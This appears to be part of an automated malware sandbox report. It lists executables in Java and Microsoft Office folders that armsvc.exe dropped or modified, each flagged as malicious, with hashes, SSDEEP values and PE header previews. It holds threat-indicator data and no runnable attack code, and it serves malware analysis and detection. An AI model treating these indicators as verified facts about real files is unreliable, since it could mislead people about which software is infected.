C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1530880
Entropy (8bit):	4.995595611774272
Encrypted:	false
SSDEEP:	24576:3KU/h/4Ku/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:3r/VuLNiXicJFFRGNzj3
MD5:	A86C2345A3734BB066C7B353A7251E9A
SHA1:	FE3B77B2BCF7D2EC024B126B3AB3ED458B60D94E
SHA-256:	99E033A08DCD9E6F105D081E0DCA5AE7DCE49F85619C12F5249B85196B466E50
SHA-512:	8AA6E1549F221A680EC2D2B1FE86D844EEA1AC0B315E14B690701773A26DC0DD2359F99A64E0B15F87A887BD9FEED9B376339D1B5078D69A6D226611D5121309
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P"......1.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1669632
Entropy (8bit):	5.069210166754158
Encrypted:	false
SSDEEP:	24576:6x7YiBLZ05jNTmJWEx5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:6xUiHIjNg5LNiXicJFFRGNzj3
MD5:	4F6642E9F615C79275F5117825A39E54
SHA1:	6127847991655DE4D9F3F665C3E6DFD8440A7009
SHA-256:	B22A575659F61251A7D1D7DF10E6100D99EF67695DBB53583D7B100A35FD80ED
SHA-512:	381AF85AA6632B91BD3A7DD62EAADCF64323BA34A17D4662F613BDFF83A8263922C93F37E24360F76855ABD92F6B4BD23F3E282254C259053F0795A33201F696
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%....."...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.5292963277790275
Encrypted:	false
SSDEEP:	12288:YorCiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:jQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	3E86FF638CF6BC3F9855388E5B343E90
SHA1:	5CB62FA012B42A6A69B082A73F118C1703118CEB
SHA-256:	C8EAFEAC7B94B5719F2EB9532094C470F35A9C8684F91BEB74DAA1D4C5458FCD
SHA-512:	748DF354AC2E928049CFEA59DFEEF36E31CAE645C2439E9D3FAACF4D0A55BB5B311172D31620A9EB2D179AB0AB8877AB2674A56E987D1CB01E9FFC4F16A0CBCD
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................J}.......................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1397760
Entropy (8bit):	4.6951738574687045
Encrypted:	false
SSDEEP:	24576:SdP/j/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:mrLNiXicJFFRGNzj3
MD5:	95AAAA2DC0C751F7BA22F270CB135179
SHA1:	E97E17C992EE4AC0DADA2ED24AC20D13A27DC47A
SHA-256:	FF589E01A72ABAB3C779D52705410BB0668EF89726FD03F7851F28DDCC075515
SHA-512:	BC7494F6BA21D09292E3C935AFD2CA22E232547A3EA452CD34096148A8557E85810A0C5174CB9C28547B38D6461DA444E45FD0F29D8B4F5316B008861632525A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................` .....Wk..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...p..........................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529325680929265
Encrypted:	false
SSDEEP:	12288:FZ56iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:TO/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	49A8E98BDECFC907642F012D6E470EB5
SHA1:	7D002324A1A1C4FAB5BBB3D070F7873EF85FF703
SHA-256:	CF79AE00939D88BC62201487843FBCB7309D20AAEAA150DD45567F3019F0E1B8
SHA-512:	8399D5EA21647C038C9881229F111033A13C5952DD33676D7CCDDB70AE1C5D9FC8B5FED979D24BC9D559C5C3D0D2F3C97C86678030E4AC199109A996797D5EFF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................8.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.5293771891909955
Encrypted:	false
SSDEEP:	12288:+ZlSiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:MK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	2795208277FBAC490822D324FA140D0C
SHA1:	C94F42EA7CE335ACE60F3DF987FDDD26D4DA6E39
SHA-256:	335161EAB92A6E9B2DC858AA622FABC8A104BFEA9622CD1025E6AFAEE327D64E
SHA-512:	B826682C1C213FDB0A36D7141AD1A897CEF9C6C393085EAC4147696C6E82D7BAFFF10E29720C4CA5887821D34C61812BC5A0A3837D692DD472F9058DAAEBDF36
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529387187089418
Encrypted:	false
SSDEEP:	12288:zNlSiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:pK/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	55D50CDA7E0A919800D1D1F9002C64A8
SHA1:	B1352A230107FA8BA0EF953765F4D656BFA19EF9
SHA-256:	63DE7401256A47A9ACEBC5716DC0AB7F360B45CCA22BDF87FFA77F419E067228
SHA-512:	5388B7B8404FE3904417EE27E3740F7D7F2D5ED6C13B0182C1145F25AA74595F5F255D87248FC9DD4A05A7D9EC046D8DEF724D7EA4E08A25987C09387D1B5DE2
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................m.......................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529361455053794
Encrypted:	false
SSDEEP:	12288:ummyiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:ZR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	40B567361D7ADB49EB22C753723F74D2
SHA1:	2330DD93B3EF861CD04FD53EBCFEFB174BA115B2
SHA-256:	648C2004234000455F501C6D9BEA9FB8DBC1ABE312149AFE59A1BDAC29E0EB0D
SHA-512:	A5A8D458E24B4240A684BBB32E014B6C4D4FDBB92ABB2DB85790B888BAF7CB29A0B11A67738E53CE53D96755861B5DCF63F4CA8476D85F8EA273E55211294EF1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................(.......................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.530196493917967
Encrypted:	false
SSDEEP:	12288:PnmGiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:fl/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	72C9978EC9A43F6FE666ECB0966B78DB
SHA1:	BE5A8C0EF795047E83FBC271AD4A7BABD357EF0C
SHA-256:	B068068CFD2454697CB085773376FB34162DAFADF039A92695C31AE0D32CFAB4
SHA-512:	A70514DA2ACE61D20F611A4661D7CB44DC3021828D6E3581C146F7253D40C9D8BB4CBF778965960A30C100806023BA8A2BADB82D3BEFECDECAB7A70CA5F74871
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.........................................................................D'.......@..P........................... #..T...........................`"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529345244411555
Encrypted:	false
SSDEEP:	12288:7T56iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:fW/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	1C1360A2B0DF694FB15779BE83A1C7DF
SHA1:	A381295A37A714B16ADC9A7D388C5E313E667541
SHA-256:	D4FED124D44C64BD0E54CB4E643F6CDE2F4C721C2711A7C0DF27ECC97ACB5D7B
SHA-512:	608BF403AB1C7CE4053280AD694AEB38CE3C0890FA987196BB82AC3535143FBF2363E781CE0913B9BF9EFD8EB4B4BE9A4389E4806A1DD243223690CD01049911
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................Z........................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529373650747986
Encrypted:	false
SSDEEP:	12288:ew/SiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:fM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	D309BD0F2F6083A067B149BFD3094667
SHA1:	4A204C4A6289026FFD3F137BB846D0C6BF52349F
SHA-256:	00C7114187B4C92014AE2048E1F7FBB08FFFF7C13101043E07C4D049102004B1
SHA-512:	28BE0E2CA949EE9791FACA1E1261DFD8554E8514D0726580AE07AFA404AB5856FD5407C18DF6B5026F5B932DE03B5ECB69780FB9516786853821E7B7F6FA63A3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................f.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529276728411964
Encrypted:	false
SSDEEP:	12288:cAmiiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:5R/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	89CA99596E1866A2963AB836928BAD1B
SHA1:	D5A62D36D28D719E74D31BEA763BF0C15462BFAB
SHA-256:	86C942248DF4570FA15C16967F959765F3DFBCD58E8DB13F1893A82503BB0E58
SHA-512:	C49BC2C51BAC62345EE3B4C6B30B9D566D93D2BF67E95FB3F4335C85E7676156DE8C6079423B6E56EDFA1FBC5D1305968EE89634E2F511116A1525DA97F91F65
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................0........................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.529331209300891
Encrypted:	false
SSDEEP:	12288:51SaiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:z9/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	C8B973EB260887D81D18DD0616A3626D
SHA1:	39B4BC2A7680418A54C461C9C915256F53B6BD9F
SHA-256:	D767E8F69CA9E8930A88DA4A5D717638B3504CFCD152005EBEE75D667EC03239
SHA-512:	B80651913D19570A730B9944FBAAF1F432BD08FD8EAABF8CD5008DF2BB518C3DE5FD668F76739D44B5B7C666626E178256387A0D65EEEC73B2A01915E430625E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1297920
Entropy (8bit):	4.52938348713195
Encrypted:	false
SSDEEP:	12288:1U/SiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:6M/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	9AB017211C2F575F7A7074AE3CEE97D6
SHA1:	9BDF250D936CC6A446B2D86540748C4961C175FC
SHA-256:	688EE7EF90C600EFC61CFBD85072A064153BADB0D2FEEE5E189EF09284E1A653
SHA-512:	9D93758F5F0C97855B01699289FB90610A8B3408EEC0540BBB88B3529F0A1FC66E5E8186CC3B2695525D62B9D025651DAF067D2E87C00F46833E098FFAC60B11
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1358336
Entropy (8bit):	4.612099575244177
Encrypted:	false
SSDEEP:	24576:XE2/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:XVLNiXicJFFRGNzj3
MD5:	AE5B877A8B97B868E04008E7633B3D90
SHA1:	70766853785101DB72C859963E2180178B5DA39E
SHA-256:	E621F8F819415FDB92E8E08E1B950FD93E818D8E4DAAB1D28F440ACEFDD9CC7E
SHA-512:	33B9B5D602E6AB4FF53B64DA72AFE3CE6F4C754CEC6687C771A2D466D2A4F604FCE40DAF4AACA6EDE2230317D02F5E71C2586D0C0D3EB2E72EB727BCFB9214C1
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..&).\^(.<&).\^-.3&).\^.=&).M-.?&).M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................\|...........u............@.................................?...........................................@....0..............................H...T...............................@...............P...P........................text...L{.......\|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...`...@......................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1298432
Entropy (8bit):	4.528970910758729
Encrypted:	false
SSDEEP:	12288:HFQ2iJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:l//TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
MD5:	504DE8C7C0CEE3DBD1CB06DB2136D6EB
SHA1:	A488B04BCD5461D9F2C7FD15A2880F7752CAC16A
SHA-256:	FE57EBBCC24BF7B73F8561DA4C603584AEB8E30B7BD79383EB39CFDE5A625CF8
SHA-512:	60B67D60DC38E8A580FEAA816619E81AA10AACB210AA0144F8DC1BBB591D9E1AA038A756A6A812AB7164D5AD05DFAAC0A928B5D25732F99F7808DC7A6171EB4A
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@.................................{\.......................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...`...P.......0..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1454592
Entropy (8bit):	4.787866541994776
Encrypted:	false
SSDEEP:	24576:Pi7le3roAa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yloroAaLNiXicJFFRGNzj3
MD5:	7A8F493AC7062B657809ECF8B6AE5D0E
SHA1:	E64267919BB02C9FC0DD93F0EE76087E11037C2A
SHA-256:	6C660269C183E8FA311CCFA679935D723C1EC0EEBDA4E38CD88809A29A00A1FF
SHA-512:	E61CA01B46B8BFF0EF799F3B030021345396CF4B5CF4FD97CAA7E35D2D84C60CC38C70D5B7B52D79C71D14F421E2128178087BDE740B89E15709514D0DC28B30
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................@!.....^...................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...`..........................@...........................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1424896
Entropy (8bit):	4.811519361103972
Encrypted:	false
SSDEEP:	24576:3NfQNu/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:dGuLNiXicJFFRGNzj3
MD5:	B90FF937ADDD7EA1FB43CF76B48D2597
SHA1:	D79C4E71DFC026CCFD00753BA92127C6E33BE06E
SHA-256:	0339CDB12BE0FC128A1DB697FF808AE6C6EDAB3F286AB93464797865254B91A2
SHA-512:	677AE34039AB4FE7A001419980F6AEFF4ABFCEA31CFFBE9B6C93639186F9187FFB87050A1E59A424519C752172680173AC7276A3D413D831CF776F4EEFE8ACD6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................\|.......\|.......\|.......\|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@........................... .............................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...p...@......................@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1443328
Entropy (8bit):	4.834711690007681
Encrypted:	false
SSDEEP:	24576:GLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gLNiXicJFFRGNzj3
MD5:	B9693A6670E2BA0A60F8BD8052CA71CE
SHA1:	8E2F3601B666084743C0AAA6D0AFBB9BB02E125E
SHA-256:	22093B879A3F47982ED3D26B892AE78216FBE74F2AFF57CD98D1B4CE0CFF6F87
SHA-512:	E3B7B898A9283CB2398F5A3215C9C7AFFD56AC0389723964F6D09733D765386CF4F6D9B309705E3D0C35412705811BACE35559C3BFB592C5CE26D9D4810D96EA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... .....F............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1443328
Entropy (8bit):	4.834708659273211
Encrypted:	false
SSDEEP:	24576:eLii/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:oLNiXicJFFRGNzj3
MD5:	62BC845F259E71AA1D20A7F1FC8CC750
SHA1:	E4E5E9DE8CA9D49445866AACA71A1D90EFA0D7EF
SHA-256:	2202109813A5F7CB25FA5AF37DD965D390D702BD0FECA216F8CE1A9E1D6FC268
SHA-512:	90385C136245FE91DBCC90D3F9F471EE521B4BEDA2A723661537BA5D19C79B798FF938BF2B8B580B13383EE24F4C1F21E9AA4A7E09B4A262CCB2A923B6C9854C
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@........................... ......j........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.....................@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc.......p.......F..............@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1499136
Entropy (8bit):	4.790126084903598
Encrypted:	false
SSDEEP:	24576:NfG/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:NfGLNiXicJFFRGNzj3
MD5:	7736D9A19EA7BE94F396B5F18F1E4540
SHA1:	234B4D673EE01F32DEE18FDC77AAD1AA41239C65
SHA-256:	52AB2CCE7808FB6E2CFC331C2110E81B73E659A6B4B0C91FFF631A762A8617C0
SHA-512:	E86C4794DD164087F451B84DE23E47C03FF11B9758FCFEDFB4FA7A496D432C045E5C5D70AD933D8E32284B9040AA48D927BB34B7961456DCD47EC58CCBEBC111
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@..............................!........... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc.......0....... ..............@...........................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe

Download File

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1651712
Entropy (8bit):	5.155364331612845
Encrypted:	false
SSDEEP:	24576:JbUO42K/EM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:JRMLNiXicJFFRGNzj3
MD5:	237213AC2275A05B2A1724C36282DDD6
SHA1:	FC29726ACB57A99D7141C14C6FA80AF6FDC95ACE
SHA-256:	6D031C4CF50D64D0C042E1E86A8687230D29D6F890A0B43367976283FC7DA22E
SHA-512:	9DC6E31C2CB9A7A59CF41C345DBD4AC7658F45E9C7167E7B867E4F9CC2EEC919B647EA30A4C1EC505EAC1F140C3F74BC7D647355134CC01293DF108C44B7263C
Malicious:	true
